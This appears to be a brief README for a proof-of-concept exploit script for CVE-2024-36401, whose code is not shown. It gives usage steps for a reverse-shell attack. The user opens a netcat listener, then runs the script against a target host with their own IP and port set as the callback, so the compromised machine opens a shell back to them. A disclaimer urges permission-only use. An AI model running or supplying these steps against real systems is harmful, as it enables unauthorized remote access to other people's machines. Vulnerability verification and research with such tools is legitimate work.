
This is a program for checking the vulnerability of CVE-2024-36401.
First, execute the following command to listen for incoming connections.
nc -lvnp 9000
Then, execute the file in another terminal window.
python CVE-2024-36401.py --target example.com --target_port 8080 --myip 172.26.16.100 --myport 9000
--target The target's domain or IP address
--target_port The port number hosting the target's service
--myip Your IP address
--myport The port number you are listening on with nc
Use this for vulnerability verification, learning, and enjoying hacking. We do not support or encourage any hacking or unauthorized access to any system or network. Use responsibly and only on systems where you have explicit permission.